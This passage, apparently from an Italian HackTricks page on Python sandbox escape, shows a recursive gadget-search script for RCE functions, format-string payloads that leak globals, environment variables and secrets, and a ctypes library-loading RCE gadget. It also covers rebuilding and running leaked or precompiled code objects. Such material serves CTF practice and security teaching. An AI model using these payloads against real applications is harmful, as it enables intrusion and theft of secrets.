MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close """ ``` ## Ricerca Ricorsiva di Builtins, Globals... {% hint style="warning" %} Questo è semplicemente **fantastico**. Se stai **cercando un oggetto come globals, builtins, open o qualsiasi altra cosa**, usa questo script per **trovare ricorsivamente i luoghi in cui puoi trovare quell'oggetto.** {% endhint %} ```python import os, sys # Import these to find more gadgets SEARCH_FOR = { # Misc "__globals__": set(), "builtins": set(), "__builtins__": set(), "open": set(), # RCE libs "os": set(), "subprocess": set(), "commands": set(), "pty": set(), "importlib": set(), "imp": set(), "sys": set(), "pip": set(), "pdb": set(), # RCE methods "system": set(), "popen": set(), "getstatusoutput": set(), "getoutput": set(), "call": set(), "Popen": set(), "popen": set(), "spawn": set(), "import_module": set(), "__import__": set(), "load_source": set(), "execfile": set(), "execute": set() } #More than 4 is very time consuming MAX_CONT = 4 #The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found #ALREADY_CHECKED = set() def check_recursive(element, cont, name, orig_n, orig_i, execute): # If bigger than maximum, stop if cont > MAX_CONT: return # If already checked, stop #if name and name in ALREADY_CHECKED: # return # Add to already checked #if name: # ALREADY_CHECKED.add(name) # If found add to the dict for k in SEARCH_FOR: if k in dir(element) or (type(element) is dict and k in element): SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}") # Continue with the recursivity for new_element in dir(element): try: check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute) # WARNING: Calling random functions sometimes kills the script # Comment this part if you notice that behaviour!! if execute: try: if callable(getattr(element, new_element)): check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute) except: pass except: pass # If in a dict, scan also each key, very important if type(element) is dict: for new_element in element: check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i) def main(): print("Checking from empty string...") total = [""] for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Empty str {i}", True) print() print("Checking loaded subclasses...") total = "".__class__.__base__.__subclasses__() for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Subclass {i}", True) print() print("Checking from global functions...") total = [print, check_recursive] for i,element in enumerate(total): print(f"\rStatus: {i}/{len(total)}", end="") cont = 1 check_recursive(element, cont, "", str(element), f"Global func {i}", False) print() print(SEARCH_FOR) if __name__ == "__main__": main() ``` Puoi controllare l'output di questo script su questa pagina: {% content-ref url="https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md" %} [https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md) {% endcontent-ref %} ## Stringa di Formato Python Se **invi** una **stringa** a python che verrà **formattata**, puoi usare `{}` per accedere a **informazioni interne di python.** Puoi usare gli esempi precedenti per accedere a globals o builtins, ad esempio. ```python # Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/ CONFIG = { "KEY": "ASXFYFGK78989" } class PeopleInfo: def __init__(self, fname, lname): self.fname = fname self.lname = lname def get_name_for_avatar(avatar_str, people_obj): return avatar_str.format(people_obj = people_obj) people = PeopleInfo('GEEKS', 'FORGEEKS') st = "{people_obj.__init__.__globals__[CONFIG][KEY]}" get_name_for_avatar(st, people_obj = people) ``` Nota come puoi **accedere agli attributi** in modo normale con un **punto** come `people_obj.__init__` e **elemento dict** con **parentesi** senza virgolette `__globals__[CONFIG]` Nota anche che puoi usare `.__dict__` per enumerare gli elementi di un oggetto `get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)` Alcune altre caratteristiche interessanti delle stringhe di formato sono la possibilità di **eseguire** le **funzioni** **`str`**, **`repr`** e **`ascii`** nell'oggetto indicato aggiungendo **`!s`**, **`!r`**, **`!a`** rispettivamente: ```python st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}" get_name_for_avatar(st, people_obj = people) ``` Inoltre, è possibile **codificare nuovi formattatori** nelle classi: ```python class HAL9000(object): def __format__(self, format): if (format == 'open-the-pod-bay-doors'): return "I'm afraid I can't do that." return 'HAL 9000' '{:open-the-pod-bay-doors}'.format(HAL9000()) #I'm afraid I can't do that. ``` **Ulteriori esempi** sugli **esempi** di **stringa** **formattata** possono essere trovati in [**https://pyformat.info/**](https://pyformat.info) {% hint style="danger" %} Controlla anche la seguente pagina per gadget che r**ead sensitive information from Python internal objects**: {% endhint %} {% content-ref url="../python-internal-read-gadgets.md" %} [python-internal-read-gadgets.md](../python-internal-read-gadgets.md) {% endcontent-ref %} ### Payload per la divulgazione di informazioni sensibili ```python {whoami.__class__.__dict__} {whoami.__globals__[os].__dict__} {whoami.__globals__[os].environ} {whoami.__globals__[sys].path} {whoami.__globals__[sys].modules} # Access an element through several links {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} # Example from https://corgi.rip/posts/buckeye-writeups/ secret_variable = "clueless" x = new_user.User(username='{i.find.__globals__[so].mapperlib.sys.modules[__main__].secret_variable}',password='lol') str(x) # Out: clueless ``` ### Dalla formattazione al caricamento RCE delle librerie Secondo il [**TypeMonkey chall di questo writeup**](https://corgi.rip/posts/buckeye-writeups/), è possibile caricare librerie arbitrarie dal disco abusando della vulnerabilità della stringa di formato in python. Come promemoria, ogni volta che viene eseguita un'azione in python, viene eseguita una funzione. Ad esempio, `2*3` eseguirà **`(2).mul(3)`** o **`{'a':'b'}['a']`** sarà **`{'a':'b'}.__getitem__('a')`**. Hai più esempi simili nella sezione [**Esecuzione Python senza chiamate**](./#python-execution-without-calls). Una vulnerabilità della stringa di formato python non consente di eseguire funzioni (non consente di utilizzare le parentesi), quindi non è possibile ottenere RCE come `'{0.system("/bin/sh")}'.format(os)`.\ Tuttavia, è possibile utilizzare `[]`. Pertanto, se una libreria python comune ha un metodo **`__getitem__`** o **`__getattr__`** che esegue codice arbitrario, è possibile abusarne per ottenere RCE. Cercando un gadget del genere in python, il writeup propone questa [**query di ricerca su Github**](https://github.com/search?q=repo%3Apython%2Fcpython+%2Fdef+%28\_\_getitem\_\_%7C\_\_getattr\_\_%29%2F+path%3ALib%2F+-path%3ALib%2Ftest%2F\&type=code). Dove ha trovato questo [uno](https://github.com/python/cpython/blob/43303e362e3a7e2d96747d881021a14c7f7e3d0b/Lib/ctypes/\_\_init\_\_.py#L463): ```python class LibraryLoader(object): def __init__(self, dlltype): self._dlltype = dlltype def __getattr__(self, name): if name[0] == '_': raise AttributeError(name) try: dll = self._dlltype(name) except OSError: raise AttributeError(name) setattr(self, name, dll) return dll def __getitem__(self, name): return getattr(self, name) cdll = LibraryLoader(CDLL) pydll = LibraryLoader(PyDLL) ``` Questo gadget consente di **caricare una libreria dal disco**. Pertanto, è necessario in qualche modo **scrivere o caricare la libreria da caricare** correttamente compilata sul server attaccato. ```python '{i.find.__globals__[so].mapperlib.sys.modules[ctypes].cdll[/path/to/file]}' ``` La sfida sfrutta in realtà un'altra vulnerabilità nel server che consente di creare file arbitrari nel disco dei server. ## Dissezionare gli Oggetti Python {% hint style="info" %} Se vuoi **imparare** a conoscere **il bytecode di python** in profondità, leggi questo **fantastico** post sull'argomento: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) {% endhint %} In alcuni CTF potresti ricevere il nome di una **funzione personalizzata in cui risiede il flag** e devi esaminare gli **interni** della **funzione** per estrarlo. Questa è la funzione da ispezionare: ```python def get_flag(some_input): var1=1 var2="secretcode" var3=["some","array"] if some_input == var2: return "THIS-IS-THE-FALG!" else: return "Nope" ``` #### dir ```python dir() #General dir() to find what we have loaded ['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x'] dir(get_flag) #Get info tof the function ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] ``` #### globals `__globals__` e `func_globals` (Stesso) Ottiene l'ambiente globale. Nell'esempio puoi vedere alcuni moduli importati, alcune variabili globali e il loro contenuto dichiarato: ```python get_flag.func_globals get_flag.__globals__ {'b': 3, 'names': ('open', 'read'), '__builtins__': , 'codeobj': at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': , 'filename': './poc.py', '__package__': None, 'read': , 'code': , 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': , '__name__': '__main__', 'foo': , '__doc__': None, 'dis': } #If you have access to some variable value CustomClassObject.__class__.__init__.__globals__ ``` [**Vedi qui altri luoghi per ottenere globals**](./#globals-and-locals) ### **Accesso al codice della funzione** **`__code__`** e `func_code`: Puoi **accedere** a questo **attributo** della funzione per **ottenere l'oggetto codice** della funzione. ```python # In our current example get_flag.__code__ ", line 1 # Compiling some python code compile("print(5)", "", "single") at 0x7f9ca01330c0, file "", line 1> #Get the attributes of the code object dir(get_flag.__code__) ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] ``` ### Ottenere informazioni sul codice ```python # Another example s = ''' a = 5 b = 'text' def f(x): return x f(5) ''' c=compile(s, "", "exec") # __doc__: Get the description of the function, if any print.__doc__ # co_consts: Constants get_flag.__code__.co_consts (None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope') c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None. (5, 'text', , 'f', None # co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects. get_flag.__code__.co_names () c.co_names ('a', 'b', 'f') #co_varnames: Local names used by the bytecode (arguments first, then the local variables) get_flag.__code__.co_varnames ('some_input', 'var1', 'var2', 'var3') #co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions. get_flag.__code__.co_cellvars () #co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function. get_flag.__code__.co_freevars () #Get bytecode get_flag.__code__.co_code 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' ``` ### **Disassemblare una funzione** ```python import dis dis.dis(get_flag) 2 0 LOAD_CONST 1 (1) 3 STORE_FAST 1 (var1) 3 6 LOAD_CONST 2 ('secretcode') 9 STORE_FAST 2 (var2) 4 12 LOAD_CONST 3 ('some') 15 LOAD_CONST 4 ('array') 18 BUILD_LIST 2 21 STORE_FAST 3 (var3) 5 24 LOAD_FAST 0 (some_input) 27 LOAD_FAST 2 (var2) 30 COMPARE_OP 2 (==) 33 POP_JUMP_IF_FALSE 40 6 36 LOAD_CONST 5 ('THIS-IS-THE-FLAG!') 39 RETURN_VALUE 8 >> 40 LOAD_CONST 6 ('Nope') 43 RETURN_VALUE 44 LOAD_CONST 0 (None) 47 RETURN_VALUE ``` Nota che **se non puoi importare `dis` nel sandbox python** puoi ottenere il **bytecode** della funzione (`get_flag.func_code.co_code`) e **disassemblarlo** localmente. Non vedrai il contenuto delle variabili che vengono caricate (`LOAD_CONST`), ma puoi indovinarle da (`get_flag.func_code.co_consts`) perché `LOAD_CONST` indica anche l'offset della variabile che viene caricata. ```python dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S') 0 LOAD_CONST 1 (1) 3 STORE_FAST 1 (1) 6 LOAD_CONST 2 (2) 9 STORE_FAST 2 (2) 12 LOAD_CONST 3 (3) 15 LOAD_CONST 4 (4) 18 BUILD_LIST 2 21 STORE_FAST 3 (3) 24 LOAD_FAST 0 (0) 27 LOAD_FAST 2 (2) 30 COMPARE_OP 2 (==) 33 POP_JUMP_IF_FALSE 40 36 LOAD_CONST 5 (5) 39 RETURN_VALUE >> 40 LOAD_CONST 6 (6) 43 RETURN_VALUE 44 LOAD_CONST 0 (0) 47 RETURN_VALUE ``` ## Compilare Python Ora, immaginiamo che in qualche modo tu possa **estrarre le informazioni su una funzione che non puoi eseguire** ma che **devi** **eseguire**.\ Come nel seguente esempio, tu **puoi accedere all'oggetto codice** di quella funzione, ma leggendo semplicemente il disassemblaggio tu **non sai come calcolare il flag** (_immagina una funzione `calc_flag` più complessa_) ```python def get_flag(some_input): var1=1 var2="secretcode" var3=["some","array"] def calc_flag(flag_rot2): return ''.join(chr(ord(c)-2) for c in flag_rot2) if some_input == var2: return calc_flag("VjkuKuVjgHnci") else: return "Nope" ``` ### Creazione dell'oggetto codice Prima di tutto, dobbiamo sapere **come creare ed eseguire un oggetto codice** in modo da poterne creare uno per eseguire la nostra funzione leaked: ```python code_type = type((lambda: None).__code__) # Check the following hint if you get an error in calling this code_obj = code_type(co_argcount, co_kwonlyargcount, co_nlocals, co_stacksize, co_flags, co_code, co_consts, co_names, co_varnames, co_filename, co_name, co_firstlineno, co_lnotab, freevars=None, cellvars=None) # Execution eval(code_obj) #Execute as a whole script # If you have the code of a function, execute it mydict = {} mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") ``` {% hint style="info" %} A seconda della versione di python, i **parametri** di `code_type` possono avere un **ordine diverso**. Il modo migliore per conoscere l'ordine dei parametri nella versione di python che stai eseguendo è eseguire: ``` import types types.CodeType.__doc__ 'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.' ``` {% endhint %} ### Ricreare una funzione trapelata {% hint style="warning" %} Nell'esempio seguente, prenderemo tutti i dati necessari per ricreare la funzione direttamente dall'oggetto codice della funzione. In un **esempio reale**, tutti i **valori** per eseguire la funzione **`code_type`** è ciò che **dovrai trapelare**. {% endhint %} ```python fc = get_flag.__code__ # In a real situation the values like fc.co_argcount are the ones you need to leak code_obj = code_type(fc.co_argcount, fc.co_kwonlyargcount, fc.co_nlocals, fc.co_stacksize, fc.co_flags, fc.co_code, fc.co_consts, fc.co_names, fc.co_varnames, fc.co_filename, fc.co_name, fc.co_firstlineno, fc.co_lnotab, cellvars=fc.co_cellvars, freevars=fc.co_freevars) mydict = {} mydict['__builtins__'] = __builtins__ function_type(code_obj, mydict, None, None, None)("secretcode") #ThisIsTheFlag ``` ### Bypass Defenses Negli esempi precedenti all'inizio di questo post, puoi vedere **come eseguire qualsiasi codice python utilizzando la funzione `compile`**. Questo è interessante perché puoi **eseguire interi script** con cicli e tutto in un **un'unica riga** (e potremmo fare lo stesso usando **`exec`**).\ Comunque, a volte potrebbe essere utile **creare** un **oggetto compilato** su una macchina locale ed eseguirlo sulla **macchina CTF** (ad esempio perché non abbiamo la funzione `compiled` nel CTF). Ad esempio, compiliamo ed eseguiamo manualmente una funzione che legge _./poc.py_: ```python #Locally def read(): return open("./poc.py",'r').read() read.__code__.co_code 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' ``` ```python #On Remote function_type = type(lambda: None) code_type = type((lambda: None).__code__) #Get consts = (None, "./poc.py", 'r') bytecode = 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S' names = ('open','read') # And execute it using eval/exec eval(code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ())) #You could also execute it directly mydict = {} mydict['__builtins__'] = __builtins__ codeobj = code_type(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '', 1, '', (), ()) function_type(codeobj, mydict, None, None, None)() ``` Se non puoi accedere a `eval` o `exec`, potresti creare una **funzione adeguata**, ma chiamarla direttamente di solito fallirà con: _costruttore non accessibile in modalità ristretta_. Quindi hai bisogno di una **funzione non nell'ambiente ristretto per chiamare questa funzione.** ```python #Compile a regular print ftype = type(lambda: None) ctype = type((lambda: None).func_code) f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdin', 'f', 1, ''), {}) f(42) ``` ## Decompilazione di Python Compilato Utilizzando strumenti come [**https://www.decompiler.com/**](https://www.decompiler.com) è possibile **decompilare** un dato codice python compilato. **Dai un'occhiata a questo tutorial**: {% content-ref url="../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} [.pyc.md](../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) {% endcontent-ref %} ## Misc Python ### Assert Python eseguito con ottimizzazioni con il parametro `-O` rimuoverà le dichiarazioni di asserzione e qualsiasi codice condizionale sul valore di **debug**.\ Pertanto, controlli come ```python def check_permission(super_user): try: assert(super_user) print("\nYou are a super user\n") except AssertionError: print(f"\nNot a Super User!!!\n") ``` will be bypassed ## Riferimenti * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/) * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) {% hint style="success" %} Impara e pratica il hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Impara e pratica il hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
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